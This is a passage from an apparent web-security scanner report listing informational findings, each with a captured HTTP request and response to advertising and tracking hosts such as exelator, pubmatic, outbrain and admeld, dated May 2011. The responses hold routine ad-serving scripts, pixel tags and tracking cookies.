Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 488

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/398/6/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true"
...[SNIP]...
20.18. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Request

GET /load/?p=201&j=w&g=001 HTTP/1.1
Host: load.exelator.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dpsync.html?upixid=6&pubid=398&dp=4*001&rannum

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: text/html
Set-Cookie: xltl=eJxLtDK0qi62MrZSCvV0UbIGsoyslExNUwxT0yxSDNIsLJMN0kwSjVLSLMwSE1NMjExSjBKNlaxrAbT3D5Q%253D; expires=Fri, 09-Sep-2011 13:34:32 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJxLtDKwqq4FAAZPAf4%253D; expires=Fri, 09-Sep-2011 13:34:32 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJxLtDK1qi62MjSyUjIyMHQwAGJLS0sjJetEKyOr6kwrQ2sgNrU0BlIGMGYthnpDkHpjNPVG1hAusj5zuDbidADFDAyJNzs1IjUnsSSVOLNrAWxAQVk%253D; expires=Fri, 09-Sep-2011 13:34:32 GMT; path=/; domain=.exelator.com
Date: Thu, 12 May 2011 13:34:32 GMT
Server: HTTP server
Content-Length: 110

<script> document.write('<img src="http://load.s3.amazonaws.com/pixel.gif" width="0" height="0" />');</script>
20.19. http://loadus.exelator.com/load/net.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxlj01rwzAQRP%252BL7gLtanclbU7%252BKhhSE5IGeguRo1BDwQeTXkr%252FexNDL%252BltGN6DmbOKfi%252Fq1Rz71mzuCdVAYMpZ2An6kXMhfx3PLnMYfQJ3SQ8OQM1tupwO6KgfmlUVNaMvyELFhpizpWthmx2ITSWXWKIjcf5Zr9r3R4VBTVN1h274CMvnrZ%252F8dua3%252FXya56X%252Bev1n7Ya1SmowIPkoDhJiiCQI8ZneHeu%252FiZg68m18sYwNW2pCbWvsKusgAiXpRAKsrJrt%252Fn5sUuDkHQfY%252FPwCqdlORA%253D%253D; BFF=eJztlsty2zAMRf%252FFX8CHZIryxok803omUj2J6klXnSyzzrLtv5ciKRoEAfmRLrrwFgcX4AOU7lvbrNtfH62s29WLEtV%252B6H4LubXW1qvNuwsbsXFUt6v%252B2zB%252Bffrx87h%252F2Y%252BrzVsr5SVKASkEKgGsMYmgQqMUVT9lqwikA3WMg1CWqwkwMEUGLjcrEjf8sHuNG14H2iiw4UAhUAlgjUkEFXruX7fSdTcKAO3jRKYVspECgYfHsQTax2FmusRjfonZngIl9uQA1qRLPMJ8AwopesEnDkEFGhUqA2ZssWrHVe0IFbxmxR1JoPw118Q6vUbz6wycWKevya7zMCyNo6fUOg8DN46HgWvDH4enfBvyOCbN0nF4Th3HVLNQ%252BYa1jGdhItLzvjwBQRuCOLcKYRDx38D9F19XGWE0YOsZwXzhg2VyqIMy%252FTPFmelhFwBNUsHhwLDieO6seDpeTjy%252FYE7sHyov7s6IuxJOFyVlTV2UCxOnZnTTSIOvulLkVVcqTxyl0eAnMSdOYdhKzplwDDNSrALctlJRYgUGEoE4BqUiAUpRuX%252BHyEAxOKhiPjgIEmK5JCY7p6ljOoepYzoDMdl5FlOdTyNLd44jS3eGYqpzEmcwfjMP3x%252Fzv6qdDcaJQqASwBqTCMw3oFD%252B%252FysbKQgq0KhQoargPZZiDN0L6vvdVmkj5uXPn75%252BBwI2zCnOs9NLeKbkLozzRkrePfWU3IVBwBlYONA4f%252Friz%252FNcsHU2kazUDSQnjSPFSaeJ4qXdsrRjpfE6Oel0mzn7s%252BjVKVtuOQ9uFz34rYab99WUhc4%252FnBc75jMGmffBZy3vjc7WFj%252FMAi4b2E%252F41E%252FYUd51njGYN%252FnI7JCwXQyQt4uMM1zygazn%252B6cWL98Vsnj2v7V45cRiyFi8aw0dY9%252FuZu1u1m43a7wnW7JfcOQLl6UJMfdeCpeleZd1nam6zkPdLdMllukvgt0M9Q%253D%253D; TFF=eJydlkFywyAMRe%252FSEyCBI%252BRsfIxus8iiM921u0zuXuzY2CDkiC4ydpj%252FzBcSgtt4iePjZwQcP9CFyQ0wMTN%252BXG8jjo%252BvEa7pN5BLD7e9PoV%252BmPW%252B0uP19ffIUcZsRBpzoVQyrMpBfvv%252Bef%252B%252B%252Fd6rb7NfCQyNMGD2c3GtsPlgBhr6OohszVccZcxGpKcadlA8ITRjIC2GVS8Ssc1Tc5QxK7EUCcTJOWw5i5j16XXWh10PzJ6wmmkhytWSJDuIwqNOlh7rQrZyFytHGbMRaQxij6e5zFxzE8v1LvVq7G84Nfaao4x1zwSdEcF5RKA4A9VZTSwzIatrfciNzxW66ZEc%252BXqmrUmdke1doZKlR7EaRk7k18iRlaOM2Yg0htzhCWCYnG92x2aeNj35GEGNAk7I8zwJsvSo5ukNp%252Bap5ihjNiI9YejwhGHuwvb13vR91U0ZNFdNwJ6qIa%252BeXG%252F0xjp%252BZeKFWWNI8q4YSOtQvF%252Fp2OX63fRIiOKuIq9oCinuRRaymX0TGRIpeodOlutS7zYrV%252B82laOM2Yg5x9ThaTm4qJ3jgx4aehG7vMkxHM9HUm%252B8zZl8VKtvr1be%252B8Cqb1eC7DjsGzOFf3J1n9c5v3PoyYlF1EDKnI1IYz6alM8%252F0Jl0IA%253D%253D; EVX=eJyNkEkSgzAMBP%252FCCzSSjWzzGBVHzjmm%252BHssQxbCktxc1TOWWmMBlftUcs5xGEvyNw23glQ6RCVTYwpGEcaGbpgKXjSxUyQjYiMTp%252FxFvUuolJ3KAYXT9nN4U3HKuXWx%252FBy3FIhGUptLt3%252FR7DtDde02qm%252BK51xdjeYqT0igqo%252Bt%252Fl5wbpfqazT%252Biu4vtb0FX9rKpW24sPUVWUnlwGc3aPHRGuVf0U%252Bf3KikRsM6VSUl6MnUjcCyIvPByc98mPFnOOQs9G%252BYRSkeZPd%252B8wM4%252B8q6

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:32 GMT
Server: HTTP server
Content-Length: 478

<HTML><BODY><img src="http://pixel.mathtag.com/data/img?mt_id=100134&mt_dcid=24&v1=&v2=&v3=&s1=&s2=&s3" width="1" height="1"></img><img src="http://bstats.adbrite.com/click/bstats.gif?bapid=6388&uid=7
...[SNIP]...
20.20. http://mads.com.com/mac-ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Request

GET /mac-ad?CELT=ifc&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:28 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:28:28 GMT
Content-Length: 1981

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
20.21. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Request

GET /utils/ping.html?random=0.24621318303979933 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIzfjUZTvndAnxUfc7q0DyhK"; _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFbCCininxsHoqtNnPoy33i"; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 13:32:28 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Thu, 12 May 2011 13:32:28 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>
20.22. http://p.brilig.com/contact/bct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Request

GET /contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2716&action=1 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbid=AF3T0ZuAGOk4NdOmwmcHrt8jZvpqOmyTfBnhe9lXkrHzvb6m4hSMri5FOCMElW8Qz5pV2zxkbOa8; BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,must-revalidate,post-check=0,pre-check=0
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:38 GMT
Expires: Mon, 19 Dec 1983 13:31:38 GMT
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Pragma: no-cache
Server: Apache/2.2.16 (Ubuntu)
Set-Cookie: BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6; Domain=.brilig.com; Expires=Sat, 04-May-2041 13:31:38 GMT
Set-Cookie: bbid=AF3T0Zvf1vDmRq2eOORXBaX-UQvWlgIUZO5XvUBOHKRHkojeDIbMFpwy0k092YGADE_VkxxdKe6RgzLMaIlJXL8-cU29eqJ7Wg; Domain=.brilig.com; Expires=Sat, 04-May-2041 13:31:38 GMT
Vary: Accept-Encoding
X-Brilig-D: D=2778
Connection: keep-alive
Content-Length: 133

<iframe frameborder='0' src='http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=7814&1=999'width='0' height='0'></iframe>
20.23. http://pixel.invitemedia.com/data_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Request

GET /data_sync?partner_id=38 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?gk8AAFU9GAAOhIEAAAAAAN17IwAAAAAAAAAAAAIAAAAAABAAAwAFCRQ-JgAAAAAAtMofAAAAAAAuiC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-1w8AAAAAAAIAAwAAAAAAPwrXo3A9.j8Mk6mCUUkDQDQzMzMzMwlA30-Nl24SEEBv27Zt27YJQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABtGq5ymMUUCtIQTrGgNDqaPlUrqNI4RJlXze4DAAAAAA==,,http%3A%2F%2Fadserving2.cpxinteractive.com%2Fst%3Fad_type%3Diframe%26ad_size%3D300x250%26section%3D1588565,Z%3D300x250%26anmember%3D541%26anprice%3D300%26s%3D1588565%26_salt%3D2649311919%26B%3D10%26r%3D0,15c8eadc-7c9c-11e0-a0b7-07e40bfd5098
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; dp_rec="{\"1\": 1304954972+ \"3\": 1305125819+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"594286\": [1305035434+ \"2214981f-6ad1-347f-b68c-65cac0743543\"+ 140741+ 69733+ 139]+ \"423816\": [1305035840+ \"562254c9-5bb8-3476-9992-adb6207f4e32\"+ 144852+ 85665+ 227]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"591269\": [1305125830+ \"TcqjuAAEHsEK5XEIPxlByw==\"+ 62899+ 25126+ 8064]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619519\": [1305033320+ \"8188923508912701641\"+ 4451+ 6017+ 1201]+ \"628850\": [1305126069+ \"57c14386-864e-359d-8fb4-c32422e3a406\"+ 11349+ 57595+ 3180]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1305033339+ \"7307077377628671859\"+ 4451+ 6017+ 1201]+ \"50347\": [1305034714+ \"f2cf7655-4055-39ab-b4a3-d0ded4a34a06\"+ 44698+ 62225+ 139]+ \"581293\": [1305035906+ \"99b5fa1e-4f3e-370e-924a-24b5b9838ca0\"+ 140741+ 69733+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"581049\": [1305035636+ \"5de90a2a-d278-31ea-a24a-0c203fa41504\"+ 140741+ 69733+ 227]}"; camp_freq_p1="eJzjkuG48plFgFli68lV71gUGDU+gmgDRgswn0uG4xVY9thxiOy5qxBZMJ9LgmP+YlYBRommzqVg2aZ/J4GyDBYMQJnpH5mBMgc6IDIHPm6By/xdBNLzpQ0i8+U3TI8IR8dGkMyqVpAMgwYDWFSY440zUPDW/yVIgiIcK8+yAp31+wuq6BSgKJPECzTRCx+YgKKPJyxAEf3+DeTA/8/mo4jOvgESfY4meu8AyNwtF369RRZdMR/k3Ml9p1FEd94HmTBr/lqEKADut2xQ"; io_freq_p1="eJzjkuY4HijAJrH15Kp3LAqMGh9BtAGTxbHjQJpLmONNqACjRFPnUqAkgwaDAYMFA1DwqytQ8EAHquATkMovbaiCXeFAwVWtqIIvhYGCt/4vQRG8GiHALPH7C6rgmkgBJokXaIK7rYGCjycsQBFc4AIU/P9sPorgeleg4JYLv94iC24DuXNy32kUwb0uQMFZ89ciBAEFMUmn"; segments_p1="eJwdUM1KAlEYZe6dxeWu5iF6g14jAnVRD+GuJ+gHG7GghIygoB5AcCBEGx0rLDMzFVoFRcH0n2OrciFO59zN4Xw/55zvXi1VIalttdaVWqrDFOAijdpdl1qrWiCdz1ovstHJvwjgWc4ChoGF6aQsHP/t1UxboYB0ugC6BamtfjvE/TFF0Sn5pEXMugxqK9CDMTXbM7CqIujhvgkroTi6CqmrHlEx2GSkW+Hy8iLgNg3o8MrKCUcrGWJ9ROxiWardWdCvY3q8+8yLEgBvCfXQp2fb3JUfUrJnzvAYuxqzfelREs/R2jTiG2qevmn9kwD9CNjeMA+99vlT5aJwSs/BiH8R9mnb2+G0/8fN8yYj3CSglEKdy9BqysjHLMMa83xonVt3pMWG9Q/+LG7L"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 12 May 2011 13:33:03 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 12-May-2011 13:32:43 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 26

<html><body></body></html>
20.24. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25277&adId=19976&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277&kltstamp=2011-4-12%208%3A31%3A14&ranreq=0.5169705713633448&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; KRTBCOOKIE_148=1699-uid:978972DFA063000D2C0E7A380BFA1DEC; PMAT=37G1VCuXv0TgpuQmot_U9evlQ-ZwaOOPD56uOCkcTeBe18znStqcWJQ; pubtime_16486=TMC; KRTBCOOKIE_80=1336-8218888f-9a83-4760-bd14-33b4666730c0.11265.49026.49027.59012.8.50185.17163.50060.17154.50064.4625.50056.57454.10518.6551.48153.48156.48157.10656.1073.24493.39944.14769.39804.38582.1097.23864.57145.45714.57148.30653.10504.10047.17857.41538.13893.55494.; KRTBCOOKIE_58=1344-AM-00000000030620452; KRTBCOOKIE_179=2451-uid:17647108006034089; KRTBCOOKIE_16=226-uid:3419824627245671268; KRTBCOOKIE_204=3579-0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; KRTBCOOKIE_200=3683-87e0a5c4e03157bf2bf35233d8beea408fe3ad97e13305ea22fd5334debaeb40; pubtime_26167=TMC; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889.806_1336137316.1765_1307641382.79_1305212190.76_1307717967; camfreq=614-2_1305212400; pubfreq_16486=165-1; pubfreq_26167=661-2:243-10:460-1; PUBMDCID=2; PMDTSHR=; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:11 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 11-May-2012 13:32:58 GMT; path=/
Set-Cookie: pubfreq_25277=; domain=pubmatic.com; expires=Sat, 14-May-2011 13:32:58 GMT; path=/
Set-Cookie: pubtime_25277=TMC; domain=pubmatic.com; expires=Fri, 13-May-2011 13:32:58 GMT; path=/
Set-Cookie: _curtime=1305207178; domain=pubmatic.com; expires=Thu, 12-May-2011 14:42:58 GMT; path=/
Set-Cookie: pubfreq_25277_19976_856941671=243-1; domain=pubmatic.com; expires=Thu, 12-May-2011 14:12:58 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Fri, 13-May-2011 13:32:58 GMT; path=/
Content-Length: 1486

document.writeln('<'+'script type="text/javascript" src="http://ad.media6degrees.com/adserv/cs?tId=9932717481735209|cb=1305207191|adType=ad|cId=6524|ec=1|spId=32750|advId=1065|exId=22|price=3.0000|pub
...[SNIP]...
20.25. http://static.arstechnica.net//public/v6/footer.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.arstechnica.net
Path:   //public/v6/footer.html

Request

GET //public/v6/footer.html?1305144886 HTTP/1.1
Host: static.arstechnica.net
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Thu, 12 May 2011 13:27:51 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: max-age=604800
Expires: Thu, 19 May 2011 13:27:51 GMT
ETag: "c492f7309304bfd57839bd2d1d4bec06"
X-CF1: fE.iad2:cf:cacheC.iad2-01
Last-Modified: Tue, 03 May 2011 20:25:54 GMT
X-CF2: L
Content-Length: 12523

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<style type="text/css">

html, body {
background: #201f25;
font-family: Arial, Helvetica, sans-serif;

...[SNIP]...
20.26. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/businesstech/300x250/businesstech_btf

Request

GET /ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
